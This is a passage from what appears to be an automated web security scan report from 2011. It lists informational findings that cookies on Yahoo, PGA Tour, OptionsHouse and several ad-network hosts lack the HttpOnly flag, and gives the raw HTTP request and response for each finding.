
Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /e/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/js?_action=show&_subAction=getThumbnail&ids=%5B%22id-482243%22%2C%22id-482610%22%5D&start=0&maxItems=6&test=&_id=a81b32&_tags=%5B%5D&_txnid=2&_crumb=O2TJF8Qm5TbVJKQVIyb0I.&_mode=json HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; myc=d=lgdbPCk32jI29Q_3alrTFdhUdvOS62KbYqbV15OhgNs5GX2tKBQbpx35R0zRmbc2LUGd9sm6Lxpmg9WFDPpxD__c009fz2GVX66td5mnZiW9ywKdpzLhUpvxPx0_YO8eLJoOmTCvIsU8dDnHSWUDxusuL9oofD8AewPqJHs645ckvFUSiZu58gMSalbacmvEfnPeELo1NplZ5H_oqzFeO8oDRo2YEgWvthq8q6VXUFZGvUFYTsX0Ch0O1C2lcf9XCCOjpDQMZJUMyxiaGSYFyQf7RTgcBtAylyd7gThn4Q1pX01g2Ad71BW5.EMxvBmfLZRYnVhVx2p9Hg3WuT.vWOvGVQqDsCX12VG21FoM&v=2; myc_s=d=nOa115432jLC_cSLwuu_lf4CTd6wQPmHPCA2hP1vQO94THfsuViFbH9mcyI_cr0GP9r0rbetQe8z05xV0Z2o4v5lJRZq8SECI0sk60MsqlHumxoaEan_CngqSvJugqGvksvtgsUNoY8vL9_WpFoPYA5m101VjH_Pitvzb_GmYa019lCJFv2m_NEOXzQtq88.KW.F1SW5xpMo5OCinwcf0GL2rIl_kSrzrG.HFpDrEfGrrxXa18kfeCfkRX1QRTUCkse0NtJ63f4d2bPZUUp6IKxQ.C2G0OdbxWhxiMkjTmH0JcuI3jcyENUWnjYBj6dd7nxfqt_liAQa2Fwu9j37WJ.uQsq4ifKSL7i_6ftSyEgKdKhwyM6bY_BY.daS4egAYqHbhrR.g97x2ik02QNDK01volhxF5DES8RS6IaT3J4kbDJKNubXAO6Y_l02pZGmiRaKpmpaztnZZY_uwIWGVCTbDHJPpswsjyjP5Dcq0XIm1tkmPP2OrOSbmUWmft2JHYnOn2TmUuDZHZWA1X0RI4H8QHD39X5im7fBk7hIskxCD0kfgLG3KUPqJu.EsvuVefk.._mcFbJ0Wtxy4x9x_jt54PqFCbOQoObGtvHFevI25eKgw6kz6OQKwmHA10QFFqyBvqy0abhz9r_HlgX7F6z61jFeREhCedssKNsUjJ.qOvQ39C..SfEF80O7fwUowNksedhAHbANPtVyXDhD0ZlbIeUp_PVZhGmurZ9iB1nbQWrdgzuEOPhhoCHVq3E8RvzDzDJPZ198uGLqzzGoqyyNVyl8yPvY.IGWZBbEWla74QSx6sa5J8C6Z2ckXD_vcuihU_amd6fVcjiXIMr4cHxHd2h.1zlF4gU-&v=2; MYTMI=4; MYTCK=AgBOZhIQAE%2FJEABiqRAAIboQAHvh

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjAzZzRmbnA3NmM0aTAiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Mon, 06-Sep-2010 12:29:51 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"2"}]

10.74. http://gdyn.pgatour.com/1.1/1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.pgatour.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1315331430246 HTTP/1.1
Host: gdyn.pgatour.com
Proxy-Connection: keep-alive
Referer: http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:30 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Set-Cookie: adDEon=true; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Tue, 06 Sep 2011 12:51:30 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.75. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=161&fmt=redirect&sec=0&d4=0 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315258459362_65704651_as3105_imp|374#1315258459362_65704651_as3105_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p161r=b$u-32#A.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/
Set-Cookie: imp=a$le#1315313083617_171501150_ap3100_int|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.76. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...

10.77. http://maps.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _ygms=z^6&l^350%20Sansome%20Street%20San%20Francisco%20CA%2094104%20us&v^1&c^37.793676%7C-122.401025; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Expires: Wed, 16 Mar 1966 12:00:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Set-Cookie: _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; expires=Thu, 06-Oct-2011 12:44:56 GMT; path=/; domain=.maps.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18922

<html><head><title>Yahoo! Maps, Driving Directions, and Traffic</title><meta name="DESCRIPTION"content="Yahoo! Maps, Driving Directions, Satellite View and Traffic. Rated the best online mapping exper
...[SNIP]...

10.78. http://marketing.aptela.com/js/mktFormSupport.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketing.aptela.com
Path:   /js/mktFormSupport.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mktFormSupport.js HTTP/1.1
Host: marketing.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=LKZYVMSBw1CYWW; path=/
Date: Tue, 06 Sep 2011 11:52:00 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:20 GMT
ETag: "ea801b-3851-4a7853cd62a00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 14417
Content-Type: application/x-javascript

/* Copyright (c) 2006-2007, Marketo, Inc. All rights reserved. */
var Mkto = {
kv : [],
kvUrl : null,
kvReferrer : null,
pageSubmitted: false
};

Mkto.parseUrlParams = function(url) {
var qu
...[SNIP]...

10.79. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/ HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Cache-Control: private
Content-Type: text/html;charset=utf-8
X-Cache: MISS from new.music.yahoo.com
Connection: close
Content-Length: 103483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script>
rtTop = Number(new Date());
</script>
<script type="text/javascript" src="http://l
...[SNIP]...

10.80. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^32; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69245; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3172566.js^2^1315313154^1315313154&638177.js^10^1315313154^1315313153&3218925.js^1^1315313153^1315313153; expires=Tue, 13-Sep-2011 12:45:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2081

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172566"
...[SNIP]...

10.81. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:52 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^3; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3218923.js^1^1315313452^1315313452&3172565.js^2^1315313133^1315313452&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:50:52 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1829

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3218923"
...[SNIP]...

10.82. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69246; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=638177.js^2^1315313132^1315313153; expires=Tue, 13-Sep-2011 12:45:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1843

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "638177" +
...[SNIP]...

10.83. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69242; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3172565.js^2^1315313133^1315313157&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:45:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2069

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172565"
...[SNIP]...

10.84. http://optimized-by.rubiconproject.com/a/dk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

